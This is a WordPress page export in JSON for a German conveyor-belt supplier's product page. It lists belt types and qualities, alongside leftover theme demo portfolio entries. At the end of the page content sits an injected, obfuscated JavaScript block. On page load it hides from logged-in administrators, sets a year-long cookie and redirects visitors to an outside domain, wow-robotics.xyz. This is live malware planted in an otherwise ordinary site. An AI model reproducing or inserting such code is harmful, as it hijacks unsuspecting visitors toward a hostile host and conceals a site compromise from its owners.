{"id":700,"date":"2019-10-28T14:35:46","date_gmt":"2019-10-28T13:35:46","guid":{"rendered":"https:\/\/transportbaender-folberth.de\/?page_id=700"},"modified":"2020-01-23T10:36:55","modified_gmt":"2020-01-23T09:36:55","slug":"referenzen","status":"publish","type":"page","link":"https:\/\/transportbaender-folberth.de\/index.php\/referenzen\/","title":{"rendered":"Produkte"},"content":{"rendered":"<p>[vc_row css=&#8220;.vc_custom_1463471775456{padding-top: 50px !important;padding-bottom: 40px !important;}&#8220;][vc_column][vc_column_text]<\/p>\n<p align=\"left\"><span style=\"font-size: x-large;\">Produkte:<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: medium;\">Transportb\u00e4nder<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: medium;\">Transportbandzubeh\u00f6r<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: medium;\">Verschlei\u00dfschutz<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: medium;\">Abstreifsysteme<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: medium;\">Gummi &#8211; Transportb\u00e4nder<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">Gummi &#8211; Transportb\u00e4nder kommen zur F\u00f6rderung von Sch\u00fctt- und<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">St\u00fcckgut zum Einsatz.<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">Wir bieten Ihnen ein gro\u00dfes Sortiment an Transportb\u00e4ndern in vielen<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">Breiten und Qualit\u00e4ten.<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">Die Fertigung erfolgt nach Ihren Vorgaben und Ma\u00dfen passgenau in <\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">unserer Werkstatt.<\/span><\/p>\n<p align=\"left\">Es stehen verschiedene Bandqualit\u00e4ten zur Auswahl :<\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; Standardqualit\u00e4t<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; \u00f6l &#8211; und fettbest\u00e4ndig<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; hitzebest\u00e4ndig<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; mit Stahlgewebe<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">Sonder<\/span><\/p>\n<p align=\"left\">Sonder &#8211; und Spezialan fertigungen:<\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; Gleitgurte<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; Steilf\u00f6rdergurte<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; Wellenkantengurte<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; Profilgummigurte<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; Stahlseilgurte<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; Lochb\u00e4nder<\/span><\/p>\n<p align=\"left\"><span style=\"font-size: medium;\">PVC\/PU Transportb\u00e4nder <\/span><\/p>\n<p align=\"left\"><span style=\"font-size: small;\">&#8211; PCV\/PU &#8211; Transportb\u00e4nder in verschiedenen Breiten und Qualit\u00e4t <\/span><\/p>\n<p>[\/vc_column_text][vc_empty_space height=&#8220;64px&#8220;][\/vc_column][vc_column]\n\t<section class=\"list-projects list2\">\n\t\t\t\t\t<div class=\"container\">\n\t\t\t\t<div class=\"row\">\n\t\t\t\t\t<div class=\"col-md-12\">\n\t\t\t\t\t\t<ul id=\"filter\" class=\"filter-projects none-style\">\n\t\t\t\t\t\t\t<li><a href=\"#\" class=\"current\" data-filter=\"*\" title=\"\">All Projects<\/a><\/li>\n\t\t\t\t\t\t\t\t            \t\t\t<li><a href=\"#\" data-filter=\".education\" title=\"\">Education<\/a><\/li>\n\t            \t\t\t\t            \t\t\t<li><a href=\"#\" data-filter=\".green-park\" title=\"\">Green Park<\/a><\/li>\n\t            \t\t\t\t            \t\t\t<li><a href=\"#\" data-filter=\".health\" title=\"\">Health<\/a><\/li>\n\t            \t\t\t\t            \t\t\t<li><a href=\"#\" data-filter=\".house\" title=\"\">House<\/a><\/li>\n\t            \t\t\t\t            \t\t\t<li><a href=\"#\" data-filter=\".interior-design\" title=\"\">Interior Design<\/a><\/li>\n\t            \t\t\t\t            \t\t\t<li><a href=\"#\" data-filter=\".office\" title=\"\">Office<\/a><\/li>\n\t            \t\t\t\t\t\t\t\t\t<\/ul>\n\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t\n\t\t\n\t\t\t\t\t<div id=\"gallery\" class=\"all-project all-project-v1\">\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item education office  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/transportbander\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/transportbander\/\">Transportb\u00e4nder<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">Education <span>,<\/span> Office <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item interior-design  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/damon-resort\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/damon-resort\/\">Damon Resort<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">Interior Design <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item house  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/zubehor\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/zubehor\/\">Zubeh\u00f6r<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">House <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item green-park health  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/verschleisschutz\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/verschleisschutz\/\">Verschlei\u00dfschutz<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">Green Park <span>,<\/span> Health <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item education green-park  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/dagittis-park\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/dagittis-park\/\">Abstreifsysteme<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">Education <span>,<\/span> Green Park <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item health  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/gummi-transportbander\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/gummi-transportbander\/\">Gummi Transportb\u00e4nder<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">Health <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item interior-design office  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/primis-office\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/primis-office\/\">PVC\/PU Transportb\u00e4nder<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">Interior Design <span>,<\/span> Office <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item green-park office  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/dagittis-city\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/dagittis-city\/\">Dagittis City<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">Green Park <span>,<\/span> Office <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t    \t\t\t\t\t\t<div class=\"item green-park  col5\">\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t<div class=\"project-box \">\n\t\t\t\t\t\t<a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/faucibus-city\/\" class=\"image-project\">\n\t\t\t\t\t\t\t<img decoding=\"async\" src=\"\" alt=\"\">\n\t\t\t\t\t\t\t<span class=\"overlay\"><\/span>\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<h4><a href=\"https:\/\/transportbaender-folberth.de\/index.php\/portfolio\/faucibus-city\/\">Faucibus City<\/a><\/h4>\n\t\t\t\t\t\t<div class=\"cat-name\">Green Park <span>,<\/span> <\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t\n\t\t\t\t\n\t<\/section>\n\n[\/vc_column][\/vc_row][vc_row css=&#8220;.vc_custom_1463471911440{padding-top: 75px !important;padding-bottom: 75px !important;background-color: #f4f4f4 !important;}&#8220;][vc_column]\n\t\n\t<div class=\"call-action\">\n\t\t<h4>We\u2019ve Completed More Than 100+ project for our amazing clients, if you interested?<\/h4>\n\t\t<a class=\"ot-btn btn-color\" href=\"http:\/\/demo.thememodern.com\/continal\/contact-us\/\" target=\"_self\">GET A QUOTE<\/a>\t<\/div>\n\n[\/vc_column][\/vc_row]<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css=&#8220;.vc_custom_1463471775456{padding-top: 50px !important;padding-bottom: 40px !important;}&#8220;][vc_column][vc_column_text] Produkte: Transportb\u00e4nder Transportbandzubeh\u00f6r Verschlei\u00dfschutz Abstreifsysteme Gummi &#8211; Transportb\u00e4nder Gummi &#8211; Transportb\u00e4nder kommen zur F\u00f6rderung von Sch\u00fctt- und St\u00fcckgut zum Einsatz. Wir bieten Ihnen ein gro\u00dfes Sortiment an Transportb\u00e4ndern in vielen Breiten und Qualit\u00e4ten. Die Fertigung erfolgt nach Ihren Vorgaben und Ma\u00dfen passgenau in unserer Werkstatt. Es stehen verschiedene Bandqualit\u00e4ten [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/700"}],"collection":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/comments?post=700"}],"version-history":[{"count":6,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/700\/revisions"}],"predecessor-version":[{"id":753,"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/pages\/700\/revisions\/753"}],"wp:attachment":[{"href":"https:\/\/transportbaender-folberth.de\/index.php\/wp-json\/wp\/v2\/media?parent=700"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}